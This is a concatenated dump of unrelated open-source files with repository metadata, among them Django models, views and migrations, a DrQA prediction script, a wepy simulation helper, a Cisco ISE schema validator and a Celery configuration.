edited_at = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'posts' | [
"embedded61@gmail.com"
] | embedded61@gmail.com |
57258779008b8a1bc52126eeb06abb34a183b4e5 | b850aafa66b84b8524cfd87ca6a475cd4d7f48df | /src/bio2bel_chebi/parser/inchis.py | a6a1252d6f077d7d8b260a9316a9bd1ac7e75ecf | [
"MIT"
] | permissive | bio2bel/chebi | 35a738542a6a7ff065a1c95ad8c53e5aa1b63c20 | e73a35cca08441a52117fc159d8f44364b1a8836 | refs/heads/master | 2020-06-26T04:50:09.859382 | 2019-11-13T13:37:25 | 2019-11-13T13:37:25 | 97,003,706 | 0 | 1 | MIT | 2018-11-13T15:40:54 | 2017-07-12T12:13:51 | Python | UTF-8 | Python | false | false | 1,259 | py | # -*- coding: utf-8 -*-
import logging
import os
from urllib.request import urlretrieve
import pandas as pd
from ..constants import INCHIS_DATA_PATH, INCHIS_URL
log = logging.getLogger(__name__)
def download_inchis(force_download=False):
"""Downloads the compound inchis
:param bool force_download: If true, overwrites a previously cached file
:rtype: str
"""
if os.path.exists(INCHIS_DATA_PATH) and not force_download:
log.info('using cached data at %s', INCHIS_DATA_PATH)
else:
log.info('downloading %s to %s', INCHIS_URL, INCHIS_DATA_PATH)
urlretrieve(INCHIS_URL, INCHIS_DATA_PATH)
return INCHIS_DATA_PATH
def get_inchis_df(url=None, cache=True, force_download=False):
"""Gets the compound's inchi keys
:param Optional[str] url: The URL (or file path) to download. Defaults to the ChEBI data.
:param bool cache: If true, the data is downloaded to the file system, else it is loaded from the internet
:param bool force_download: If true, overwrites a previously cached file
:rtype: pandas.DataFrame
"""
if url is None and cache:
url = download_inchis(force_download=force_download)
return pd.read_csv(
url or INCHIS_URL,
sep='\t'
)
| [
"cthoyt@gmail.com"
] | cthoyt@gmail.com |
33c88c043e19e96f7ec08c9b8158b562e0b70726 | 3cd4902b67de144d8e6f36335e125d0548d8cf97 | /tools/detecting/detectron/DetectronDetector.py | d0414990eb597a4ad1c3d6b3ff9435d39727a628 | [
"MIT"
] | permissive | stefantaubert/imageclef-lifelog-2019 | 5d201c2a28f15f608b9b58b94ab2ecddb5201205 | ad49dc79db98a163c5bc282fb179c0f7730546b3 | refs/heads/master | 2022-10-06T12:42:30.011610 | 2022-08-29T13:35:09 | 2022-08-29T13:35:09 | 196,553,184 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,260 | py | import pickle
from src.detecting.DetectorBase import DetectorBase
from src.detecting.img_path_parser import get_paths
from src.io.paths import get_path_detectron
from src.globals import usr1
"""
I run detectron on remote machine and save the results as a dictionary with keys = image_id and values: class predictions.
This dictionary will be loaded as model.
The threshold is set to 0.5
"""
class DetectronDetector(DetectorBase):
def __init__(self):
print("Load predictions from detectron...")
self.predictions = pickle.load(open( "/tmp/pred.pkl", "rb"), encoding='latin1')
print("Preprocessing...")
paths = get_paths()
self.ids_to_paths = {}
for path in paths:
img_id = path[0]
img_path = path[1]
self.ids_to_paths[img_path] = img_id
def detect_image(self, img):
img_id = self.ids_to_paths[img]
if img_id in self.predictions:
r = self.predictions[img_id]
else:
r = []
return r
if __name__ == "__main__":
d = DetectronDetector()
csv = d.detect_images_auto(usr1)
file_name = get_path_detectron(usr=usr1)
csv.to_csv(file_name, index=False)
print("Successfully saved to", file_name) | [
"stefan.taubert@posteo.de"
] | stefan.taubert@posteo.de |
df7c68265d10a6433fd2266a5d72fd920abbefbb | 11e8bf1ae982cf4aefcc8f146a7d706e854ea8bb | /royale/urls.py | ca5d0de7fc1b38c336288ea9bf9582a93b0c5b42 | [] | no_license | DK-denno/royalAndRich | d9801a8bb26b915a3c6d0e09e3930f4339ff8c52 | 91e36257ce8ea192ff65c993aab7ea23958dc3c5 | refs/heads/master | 2023-08-26T14:16:13.306965 | 2020-02-20T10:10:42 | 2020-02-20T10:10:42 | 240,218,352 | 0 | 0 | null | 2021-09-22T18:36:12 | 2020-02-13T09:07:42 | CSS | UTF-8 | Python | false | false | 460 | py | from django.urls import path
from django.conf.urls.static import static
from django.conf import settings
from . import views
#Your views go here
urlpatterns=[
path(r'',views.index,name="home"),
path(r'about/',views.about,name='about'),
path(r'classes/<int:code>/',views.classes,name="classes"),
path(r'contact/',views.contact,name="contact"),
]
if settings.DEBUG:
urlpatterns+=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | [
"dennisveer27@gmail.com"
] | dennisveer27@gmail.com |
5dbf192b4ecf8a9c22c3a203e1bcfe82214a1d63 | eacfc0cddb477973a3ca491f35da14b1bda477c3 | /src/wepy_tools/sim_makers/openmm/lennard_jones.py | 4a7c741bdea75a841d2beeb2cc3d469f75dffb90 | [
"MIT"
] | permissive | edeustua/wepy | 933ccb4c15b4a80393700333a04fd01f229e27e3 | f1a2ef5c8cc368d5602c9d683983b3af69a48ce2 | refs/heads/master | 2020-09-29T04:40:55.759360 | 2019-12-06T23:33:11 | 2019-12-06T23:33:11 | 226,952,678 | 0 | 0 | MIT | 2019-12-09T19:40:26 | 2019-12-09T19:40:25 | null | UTF-8 | Python | false | false | 2,492 | py | import numpy as np
from scipy.spatial.distance import euclidean
from wepy.runners.openmm import GET_STATE_KWARG_DEFAULTS
from wepy.resampling.distances.distance import Distance
from wepy.boundary_conditions.receptor import UnbindingBC
from openmmtools.testsystems import LennardJonesPair
from wepy_tools.sim_makers.openmm import OpenMMToolsTestSysSimMaker
## Distance Metric
# we define a simple distance metric for this system, assuming the
# positions are in a 'positions' field
class PairDistance(Distance):
def __init__(self, metric=euclidean):
self.metric = metric
def image(self, state):
return state['positions']
def image_distance(self, image_a, image_b):
dist_a = self.metric(image_a[0], image_a[1])
dist_b = self.metric(image_b[0], image_b[1])
return np.abs(dist_a - dist_b)
# class PairUnbinding(BoundaryCondition):
# pass
class LennardJonesPairOpenMMSimMaker(OpenMMToolsTestSysSimMaker):
TEST_SYS = LennardJonesPair
BCS = OpenMMToolsTestSysSimMaker.BCS + [UnbindingBC]
LIGAND_IDXS = [0]
RECEPTOR_IDXS = [1]
UNBINDING_BC_DEFAULTS = {
'cutoff_distance' : 1.0, # nm
'periodic' : False,
}
DEFAULT_BC_PARAMS = OpenMMToolsTestSysSimMaker.DEFAULT_BC_PARAMS
DEFAULT_BC_PARAMS.update(
{
'UnbindingBC' : UNBINDING_BC_DEFAULTS,
}
)
def make_bc(self, bc_class, bc_params):
if bc_class == UnbindingBC:
bc_params.update(
{
'distance' : self.distance,
'initial_state' : self.init_state,
'topology' : self.json_top(),
'ligand_idxs' : self.LIGAND_IDXS,
'receptor_idxs' : self.RECEPTOR_IDXS,
}
)
bc = bc_class(**bc_params)
return bc
def __init__(self):
# must set this here since we need it to generate the state,
# will get called again in the superclass method
self.getState_kwargs = dict(GET_STATE_KWARG_DEFAULTS)
if self.GET_STATE_KWARGS is not None:
self.getState_kwargs.update(self.GET_STATE_KWARGS)
test_sys = LennardJonesPair()
init_state = self.make_state(test_sys.system, test_sys.positions)
super().__init__(
distance=PairDistance(),
init_state=init_state,
system=test_sys.system,
topology=test_sys.topology,
)
| [
"samuel.lotz@salotz.info"
] | samuel.lotz@salotz.info |
31bb29a5c07f4c3feb4ecfe83bfab2823b6a4cfd | 5785d7ed431b024dd910b642f10a6781df50e4aa | /revise-daily/google/educative/dp/8_count_palindromic_substrings.py | 52508c3007719253316bfe8c5f1b6816f8bdfaa4 | [] | no_license | kashyapa/interview-prep | 45d77324446da34d99bf8efedb3544b367b5523e | 7060c090c40602fb9c4778eace2078e1b51e235b | refs/heads/master | 2023-07-28T13:12:49.515299 | 2021-09-06T14:33:25 | 2021-09-06T14:33:25 | 403,706,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py |
def count_palindromic_substrings(s):
n = len(s)
def is_palindrome(t):
return t == t[::-1]
count = 0
for i in range(n):
for j in range(i+1):
substr = s[j:i+1]
if is_palindrome(substr):
count += 1
return count | [
"schandra2@godaddy.com"
] | schandra2@godaddy.com |
86d5c1b6dd0df2f209c9cc42fc7d9348c3668873 | d4442db5a7ab9db2b04fef640a9864f3fba54758 | /test/python/WMComponent_t/JobAccountant_t/fwjrs/genheritagetest.py | 9a7a0a40d5bd27ceeb6ac7e078d5084b139e9fea | [] | no_license | stuartw/WMCore | fa25ff19ab5058a635d35d3c58a0ac56a3e079a1 | 38c39c43f7237fd316930839674ac9be3c0ee8cc | refs/heads/master | 2021-01-18T07:18:18.324604 | 2012-10-18T22:30:34 | 2012-10-18T22:30:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,004 | py | #!/usr/bin/env python
import random
from WMCore.FwkJobReport import Report
from WMCore.DataStructs.Run import Run
from WMCore.Services.UUID import makeUUID
outputModules = ["outputModule1", "outputModule2", "outputModule3",
"outputModule4", "outputModule5", "outputModule6",
"outputModule7", "outputModule8", "outputModule9",
"outputModule10"]
runInfo = Run(1)
runInfo.lumis.extend([11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24,
25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38,
39, 40])
totalReports = 25
inputFilesPerReport = 50
inputFileCounter = 0
for i in range(totalReports):
loadTestReport = Report.Report("cmsRun1")
loadTestReport.addInputSource("PoolSource")
for j in range(inputFilesPerReport):
inputFile = loadTestReport.addInputFile("PoolSource", lfn = "input%i" % inputFileCounter,
events = 600000, size = 600000)
inputFileCounter += 1
Report.addRunInfoToFile(inputFile, runInfo)
for outputModule in outputModules:
loadTestReport.addOutputModule(outputModule)
datasetInfo = {"applicationName": "cmsRun", "applicationVersion": "CMSSW_3_3_5_patch3",
"primaryDataset": outputModule, "dataTier": "RAW",
"processedDataset": "LoadTest10"}
fileAttrs = {"lfn": makeUUID(), "location": "cmssrm.fnal.gov",
"checksums": {"adler32": "ff810ec3", "cksum": "2212831827"},
"events": random.randrange(500, 5000, 50),
"merged": True,
"size": random.randrange(1000, 2000, 100000000),
"module_label": outputModule, "dataset": datasetInfo}
outputFile = loadTestReport.addOutputFile(outputModule, fileAttrs)
Report.addRunInfoToFile(outputFile, runInfo)
loadTestReport.persist("HeritageTest%02d.pkl" % i)
| [
"metson@4525493e-7705-40b1-a816-d608a930855b"
] | metson@4525493e-7705-40b1-a816-d608a930855b |
420668d0471ddfbafbaf0dad7310591ab306d6a3 | a66b69c3f9da9779ae80f347b61f47e3bc5ba145 | /day1011/listex02.py | b3ea0e6ba188c71120e4efb0096c38079bc66870 | [] | no_license | kyungtae92/python-basic | c841d9c9c6196b01da3de007c1298fe2c4b8f693 | 80a2051e37b6e87c9dbfd332c4b2946089ff0d5c | refs/heads/master | 2020-11-25T08:01:22.156661 | 2019-12-17T08:25:38 | 2019-12-17T08:25:38 | 228,567,120 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | # 리스트 문자열에서 인덱스를 이용한 출력
text = "Will is power"
print(text[0], text[3], text[-1])
flist = ["apple", "banana", "tomato", "peach", "pear"]
print(flist[0], flist[3], flist[-1])
# 리스트 또는 문자열에서 슬라이싱에서 원하는 범위만큼 출력
sqr = [0,1,4,9,16,25,35,49]
print(sqr[3:6])
print(sqr[3:])
# 리스트 두개 합치기
marvel = ['스파이더맨', '토르', '아이언맨']
dc = ['슈퍼맨', '베트맨', '아쿠아맨']
heros = marvel + dc # 문자열 합치기
print(heros)
for name in heros:
print(name)
# 리스트를 연속적인 숫자만큼 추가하기
values = [1,2,3] * 3
print(values) | [
"noreply@github.com"
] | kyungtae92.noreply@github.com |
fda51d083f1d95aaab3c9623e46013c49c73c731 | 464d461e2c90724950cae9db0c4b72b55d82aab8 | /jumia/migrations/0008_healthbeautyscrape_kidsfashionscrape_menfashionscrape_womenfashionscrape.py | 3f2670f6ea77d1bac89cbfeb56a8c383c57531a2 | [
"MIT"
] | permissive | Kolaposki/Discoco | 47a1b4dde54612bf7b2adc372fc3ba8950f233af | 0a4d799c19639681e264e2d39f3a1c134d42d573 | refs/heads/master | 2023-05-24T19:46:08.713235 | 2022-07-25T05:32:20 | 2022-07-25T05:32:20 | 233,392,472 | 4 | 3 | null | 2023-05-22T22:40:50 | 2020-01-12T12:55:40 | JavaScript | UTF-8 | Python | false | false | 2,693 | py | # Generated by Django 3.0.1 on 2020-02-07 17:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jumia', '0007_electronicsscrape_fashionscrape'),
]
operations = [
migrations.CreateModel(
name='HealthBeautyScrape',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('percent', models.IntegerField()),
('product', models.CharField(max_length=200)),
('price', models.CharField(max_length=10)),
('old_price', models.CharField(max_length=10)),
('product_url', models.URLField(max_length=300, unique=True)),
('img_url', models.URLField(max_length=300)),
],
),
migrations.CreateModel(
name='KidsFashionScrape',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('percent', models.IntegerField()),
('product', models.CharField(max_length=200)),
('price', models.CharField(max_length=10)),
('old_price', models.CharField(max_length=10)),
('product_url', models.URLField(max_length=300, unique=True)),
('img_url', models.URLField(max_length=300)),
],
),
migrations.CreateModel(
name='MenFashionScrape',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('percent', models.IntegerField()),
('product', models.CharField(max_length=200)),
('price', models.CharField(max_length=10)),
('old_price', models.CharField(max_length=10)),
('product_url', models.URLField(max_length=300, unique=True)),
('img_url', models.URLField(max_length=300)),
],
),
migrations.CreateModel(
name='WomenFashionScrape',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('percent', models.IntegerField()),
('product', models.CharField(max_length=200)),
('price', models.CharField(max_length=10)),
('old_price', models.CharField(max_length=10)),
('product_url', models.URLField(max_length=300, unique=True)),
('img_url', models.URLField(max_length=300)),
],
),
]
| [
"oshodikolapo@gmail.com"
] | oshodikolapo@gmail.com |
8cf61bd51098673db4e399337ad6541fee589be4 | 3973fa32d968b7ab2d1c8da29bffd2d1544151d3 | /scripts/pipeline/predict.py | 68aca425ac4f576611a9ed3afee48f71468e8091 | [
"BSD-3-Clause"
] | permissive | SBUNetSys/DeQA | 638e2fa21013bda5f254c75eb492418f4764d2c9 | 5baf2e151b8230dde3147d2a1e216a3e434375bb | refs/heads/master | 2020-06-19T21:18:07.047544 | 2019-07-14T19:48:00 | 2019-07-14T19:48:00 | 196,876,581 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,422 | py | #!/usr/bin/env python3
# Copyright 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
"""Run predictions using the full DrQA retriever-reader pipeline."""
import argparse
import json
import logging
import os
import sys
import time
import torch
from drqa import pipeline, retriever, DATA_DIR
logger = logging.getLogger()
logger.setLevel(logging.INFO)
fmt = logging.Formatter('%(asctime)s.%(msecs)03d: [ %(message)s ]', '%m/%d/%Y_%H:%M:%S')
console = logging.StreamHandler()
console.setFormatter(fmt)
logger.addHandler(console)
parser = argparse.ArgumentParser()
parser.add_argument('dataset', type=str)
parser.add_argument('--out-file', type=str, default=None,
help="path to write prediction file")
parser.add_argument('--reader-model', type=str, default=None,
help="Path to trained Document Reader model")
parser.add_argument('--normalize', action='store_true', help="Use normalized answer score")
parser.add_argument('--retriever-model', type=str, default=None,
help="Path to Document Retriever model (tfidf)")
parser.add_argument('--db_path', type=str, default=None,
help='Path to Document DB or index')
parser.add_argument('--n_docs', type=int, default=150,
help="Number of docs to retrieve per query")
parser.add_argument('--top_n', type=int, default=150,
help="Number of predictions to make per query")
parser.add_argument('--tokenizer', type=str, default='corenlp',
help=("String option specifying tokenizer type to use "
"(e.g. 'corenlp')"))
parser.add_argument('--no-cuda', action='store_true', help="Use CPU only")
parser.add_argument('--gpu', type=int, default=0,
help="Specify GPU device id to use")
parser.add_argument('--parallel', action='store_true',
help='Use data parallel (split across gpus)')
parser.add_argument('--num-workers', type=int, default=None,
help='Number of CPU processes (for tokenizing, etc)')
parser.add_argument('--batch-size', type=int, default=128,
help='Document paragraph batching size')
parser.add_argument('--predict-batch-size', type=int, default=1,
help='Question batching size')
parser.add_argument('--ranker', type=str, default='lucene')
parser.add_argument('--et_threshold', type=float, default=None,
help='early stopping threshold')
parser.add_argument('--et_model', type=str, default=None,
help='early stopping model')
parser.add_argument("-v", "--verbose", help="log more debug info", action="store_true")
args = parser.parse_args()
if args.verbose:
logger.setLevel(logging.DEBUG)
t0 = time.time()
# log_filename = ('_'.join(sys.argv) + time.strftime("%Y%m%d-%H%M%S")).replace('/', '_')
# logfile = logging.FileHandler('/tmp/%s.log' % log_filename, 'w')
# logfile.setFormatter(fmt)
# logger.addHandler(logfile)
logger.info('COMMAND: python %s' % ' '.join(sys.argv))
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
torch.cuda.set_device(args.gpu)
logger.info('CUDA enabled (GPU %d)' % args.gpu)
else:
logger.info('Running on CPU only.')
if args.ranker.lower().startswith('s'):
ranker = retriever.get_class('sql')(db_path=args.db_path)
elif args.ranker.lower().startswith('l'):
ranker = retriever.get_class('lucene')(index_path=args.db_path)
else:
ranker = retriever.get_class('tfidf')(tfidf_path=args.retriever_model, db_path=args.db_path)
logger.info('Initializing pipeline...')
DrQA = pipeline.DrQA(
reader_model=args.reader_model,
normalize=args.normalize,
tokenizer=args.tokenizer,
batch_size=args.batch_size,
cuda=args.cuda,
data_parallel=args.parallel,
ranker=ranker,
num_workers=args.num_workers,
et_model=args.et_model,
et_threshold=args.et_threshold
)
# ------------------------------------------------------------------------------
# Read in dataset and make predictions
# ------------------------------------------------------------------------------
logger.info('Loading queries from %s' % args.dataset)
queries = []
for line in open(args.dataset):
data = json.loads(line)
queries.append(data['question'])
model_name = os.path.splitext(os.path.basename(args.reader_model or 'default'))[0]
data_name = os.path.splitext(os.path.basename(args.dataset))[0]
outfile = args.out_file or os.path.join(DATA_DIR, '{}-{}.predictions.txt'.format(data_name, model_name))
out_dir = os.path.dirname(outfile)
os.makedirs(out_dir, exist_ok=True)
logger.info('Writing results to %s' % outfile)
with open(outfile, 'w') as f:
batches = [queries[i: i + args.predict_batch_size]
for i in range(0, len(queries), args.predict_batch_size)]
for i, batch in enumerate(batches):
batch_info = '-' * 5 + ' Batch %d/%d ' % (i + 1, len(batches)) + '-' * 5 + ' '
start_query = queries[i]
logger.info(batch_info + start_query)
predictions = DrQA.process(batch, n_docs=args.n_docs, top_n=args.top_n)
for p in predictions:
p = sorted(p, key=lambda k: k['doc_score'], reverse=True)
f.write(json.dumps(p) + '\n')
logger.info('Total time: %.4f' % (time.time() - t0))
| [
"qqcao.cs@gmail.com"
] | qqcao.cs@gmail.com |
966807e614ac6bbe170a8ae017f3233ee5378d41 | 8130c34d546c323d6d5d2ca6b4a67330af08828f | /.history/menu_app/views_20210104163425.py | 0d705d9f471965254e8ff1766b6e951f8ca7ff08 | [] | no_license | lienusrob/final | ba2dad086fc97b21b537ef12df834dfadd222943 | f2726e31f1d51450e4aed8c74021c33679957b28 | refs/heads/master | 2023-02-15T01:36:54.463034 | 2021-01-07T12:47:05 | 2021-01-07T12:47:05 | 327,279,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,003 | py |
from .models import Cart, CartItem, MenuItem, ItemsCategory, Order, Orders, generate_order_id, Extras
from account_app.models import Profile
from .forms import AddToCartForm
from django.views.generic import ListView
from django.shortcuts import render, get_object_or_404, redirect
from django.urls import reverse
from django.utils import timezone
class MenuListView(ListView):
model = MenuItem
template_name = 'items/menu_list.html'
def menu_list_view(request):
item_list = MenuItem.objects.all()
context = {'item_list': item_list,
'item_categories':reversed(ItemsCategory.objects.all()),
'item_categories_side_nav':reversed(ItemsCategory.objects.all())}
return render(request, 'menu_app/menu_list.html', context)
def home(request):
category_menu = ItemsCategory.objects.all()
context = {'category_menu': category_menu}
return render (request, 'homepage.html', context)
def menu_item_detail(request, **kwargs):
item = MenuItem.objects.filter(id=kwargs.get('pk')).first()
context = {'item':item}
return render(request, 'menu_app/item_details.html', context)
def new_order_info(request):
user_profile = get_object_or_404(Profile, user=request.user)
order, created = Order.objects.get_or_create(customer=user_profile.user, is_ordered=False)
if created:
order.ref_code = generate_order_id()
order.save()
context = {'order':order}
return render(request, 'items/order_info.html', context)
def cart (request):
cart = Cart.objects.get(user = request.user, current = True)
cart_items = CartItem.objects.filter(cart = cart)
context = {'cart_items':cart_items}
return render (request, 'menu_app/cart.html', context )
def menu_details(request, name):
category = ItemsCategory.objects.get(name=name)
menu_details = MenuItem.objects.filter(category=category)
context = {'menu_details':menu_details, 'category':name, 'user':request.user}
if request.method=="POST":
form = AddToCartForm(request.POST or None)
form.cart = Cart.objects.get_or_create(user=request.user, current=True)
form.save()
#messages.success(request, "Item" "added to cart successfully!, please go to cart and check for items.")
return render(request, ('menu_app/menu_list.html'), context)
def cart(request):
cart = Cart.objects.get(user=request.user, current=True)
cart_items = CartItem.objects.filter(cart=cart)
extras = Extras.objects.all()
context = {'cart_items':cart_items, 'extras': extras}
return render(request, 'menu_app/cart.html', context)
def view_cart(request):
"""A View that renders the cart contents page"""
return render(request, "cart.html")
def add_to_cart(request, id):
"""Add a quantity of the specified product to the cart"""
quantity = int(request.POST.get('quantity'))
cart = request.session.get('cart', {})
if id in cart:
cart[id] = int(cart[id]) + quantity
else:
cart[id] = cart.get(id, quantity)
request.session['cart'] = cart
return redirect('homepage')
def adjust_cart(request, id):
quantity = int(request.POST.get('quantity'))
cart = request.session.get('cart', {})
if quantity > 0:
cart[id] = quantity
else:
cart.pop(id)
request.session['cart'] = cart
return redirect('view_cart')
def orders (request):
cart = Cart.objects.get(user=request.user, current = True)
cart_items = CartItem.objects.filter(cart__pk__ = cart.pk)
if request.method == "POST":
for key, value in request.POST.items():
if key == "csrfmiddleweartoken":
continue
cart.current == False
cart.date_ordered= timezone.now()
cart.save()
orders= Orders (cart = cart)
orders.save()
cart = Cart(user=request.user)
cart.save()
context = {'order':orders}
return render (request, 'order_info.html', context)
| [
"lienus.rob@hotmail.de"
] | lienus.rob@hotmail.de |
e0650e53f4315a7ace0c0cd4c087506a4d2f209d | 1ff265ac6bdf43f5a859f357312dd3ff788804a6 | /lab_18_if_challenge.py | f421762b2c086de477f11ec2eed7e78cbab95eec | [] | no_license | sgriffith3/july_pyb | f1f493450ab4933a4443518863f772ad54865c26 | 5e06012ad436071416b95613ed46e972c46b0ff7 | refs/heads/master | 2022-11-19T04:58:41.632000 | 2020-07-17T19:46:44 | 2020-07-17T19:46:44 | 279,335,603 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 663 | py | # Hurricane Rating System
import random
storm = random.randint(1, 200)
print(storm)
# Five 157 or greater
if storm >= 157:
print("Cat 5")
# Four 130 to 156
elif storm >= 130:
print("Cat 4")
# Three 111 to 129
elif storm >= 111:
print("Cat 3")
# Two 96 to 110
elif storm >= 96:
print("Cat 2")
# One 74 to 95
elif storm >= 74:
print("Cat 1")
# Tropical Storm 39 to 73
elif storm >= 39:
print("Tropical Storm")
# Tropical Depression less than or equal to 38
else:
print("Tropical Depression")
if storm <= 157 and storm >= 74:
print("Cat 1, 2, 3, or 4")
elif storm >= 157 or storm <= 74:
print("Its not a Cat 1, 2, 3, or 4")
| [
"sgriffith@alta3.com"
] | sgriffith@alta3.com |
e8e1ffe845d61c38aad005af58ab3b94ba501715 | b227199eda4f1e894199c8a8f5e87c39df83af45 | /examples/tdd/tests/functional/test_users.py | 4160a2ee094794a0b20cd67104ddd644ad404cbb | [] | no_license | gabrielfalcao/tumbler | c8d67a8bfd4555ff0fe04f984017620ee320fe7f | 322976083b2c76286f98dcad445eb22b7665f24f | refs/heads/master | 2021-01-20T05:53:47.780517 | 2015-06-24T19:32:58 | 2015-06-24T19:32:58 | 29,232,813 | 3 | 0 | null | 2019-12-20T17:20:26 | 2015-01-14T07:33:42 | Python | UTF-8 | Python | false | false | 788 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
from sure import scenario
from datetime import datetime
from freezegun import freeze_time
from tumbler.core import Web
from timeless.models import User
def prepare_db(context):
context.web = Web()
context.web.prepare_models()
context.web.db.create_all()
def cleanup_db(context):
context.web.db.drop_all()
@freeze_time("2005-01-01")
@scenario(prepare_db, cleanup_db)
def test_create_user(context):
('Creating a user should work')
result = User.create(
email=u'bar@bar.com',
password='foobar'
)
result.to_dict().should.equal({
'date_added': datetime(2005, 1, 1, 0, 0),
'email': u'bar@bar.com',
'id': 1,
'name': None,
'password': u'foobar'
})
| [
"gabriel@nacaolivre.org"
] | gabriel@nacaolivre.org |
d2b6c214a809b88c7e0670089891752e488a98bf | 4e30d990963870478ed248567e432795f519e1cc | /ciscoisesdk/models/validators/v3_1_1/jsd_d0ee193cc65780af11ed96b1758755.py | b8fdbb93fe7fa8f08ca7035bf6c68d28a611e89f | [
"MIT"
] | permissive | CiscoISE/ciscoisesdk | 84074a57bf1042a735e3fc6eb7876555150d2b51 | f468c54998ec1ad85435ea28988922f0573bfee8 | refs/heads/main | 2023-09-04T23:56:32.232035 | 2023-08-25T17:31:49 | 2023-08-25T17:31:49 | 365,359,531 | 48 | 9 | MIT | 2023-08-25T17:31:51 | 2021-05-07T21:43:52 | Python | UTF-8 | Python | false | false | 3,583 | py | # -*- coding: utf-8 -*-
"""Identity Services Engine registerNode data model.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import json
from builtins import *
import fastjsonschema
from ciscoisesdk.exceptions import MalformedRequest
class JSONSchemaValidatorD0Ee193Cc65780Af11Ed96B1758755(object):
"""registerNode request schema definition."""
def __init__(self):
super(JSONSchemaValidatorD0Ee193Cc65780Af11Ed96B1758755, self).__init__()
self._validator = fastjsonschema.compile(json.loads(
'''{
"$schema": "http://json-schema.org/draft-04/schema#",
"properties": {
"allowCertImport": {
"type": "boolean"
},
"fqdn": {
"type": "string"
},
"password": {
"type": "string"
},
"roles": {
"items": {
"enum": [
"PrimaryAdmin",
"PrimaryDedicatedMonitoring",
"PrimaryMonitoring",
"SecondaryAdmin",
"SecondaryDedicatedMonitoring",
"SecondaryMonitoring",
"Standalone"
],
"type": "string"
},
"type": "array"
},
"services": {
"items": {
"enum": [
"DeviceAdmin",
"PassiveIdentity",
"Profiler",
"SXP",
"Session",
"TC-NAC",
"pxGrid",
"pxGridCloud"
],
"type": "string"
},
"type": "array"
},
"userName": {
"type": "string"
}
},
"required": [
"allowCertImport",
"fqdn",
"password",
"roles",
"services",
"userName"
],
"type": "object"
}'''.replace("\n" + ' ' * 16, '')
))
def validate(self, request):
try:
self._validator(request)
except fastjsonschema.exceptions.JsonSchemaException as e:
raise MalformedRequest(
'{} is invalid. Reason: {}'.format(request, e.message)
)
| [
"wastorga@altus.co.cr"
] | wastorga@altus.co.cr |
5b67a2791270a6af0fcb24d49ab43ac438bc7ae7 | 055f4cc4d565b33d76c1f87c0dfe02f67328a3c9 | /celery_snippet/celery_snippet/celery.py | b9d9290076e141092c5ad792b1ebf785e5120dec | [] | no_license | Sundarmax/python-celery-django | 0eb4ac38df69bcaa9fed4f7c3f28b1904bb21fcc | 3b0c47cee80056dae36d970a3ceb774f279548eb | refs/heads/master | 2023-04-02T14:47:01.628356 | 2021-04-08T10:23:41 | 2021-04-08T10:23:41 | 355,795,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | from __future__ import absolute_import, unicode_literals
import os
from celery import Celery
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'celery_snippet.settings')
app = Celery('celery_snippet')
app.config_from_object('django.conf:settings', namespace='CELERY')
app.autodiscover_tasks()
| [
"sundar.info22@gmail.com"
] | sundar.info22@gmail.com |
c9efe071470bec0e0fd25716ccb12f14514f472e | 1825283527f5a479204708feeaf55f4ab6d1290b | /leetcode/python/928/original/928.minimize-malware-spread-ii.0.py | f3b1e244ce25969bd413823d5bb20f56702a671e | [] | no_license | frankieliu/problems | b82c61d3328ffcc1da2cbc95712563355f5d44b5 | 911c6622448a4be041834bcab25051dd0f9209b2 | refs/heads/master | 2023-01-06T14:41:58.044871 | 2019-11-24T03:47:22 | 2019-11-24T03:47:22 | 115,065,956 | 1 | 0 | null | 2023-01-04T07:25:52 | 2017-12-22T02:06:57 | HTML | UTF-8 | Python | false | false | 1,960 | py | #
# @lc app=leetcode id=928 lang=python3
#
# [928] Minimize Malware Spread II
#
# https://leetcode.com/problems/minimize-malware-spread-ii/description/
#
# algorithms
# Hard (38.10%)
# Total Accepted: 3K
# Total Submissions: 7.8K
# Testcase Example: '[[1,1,0],[1,1,0],[0,0,1]]\n[0,1]'
#
# (This problem is the same as Minimize Malware Spread, with the differences
# bolded.)
#
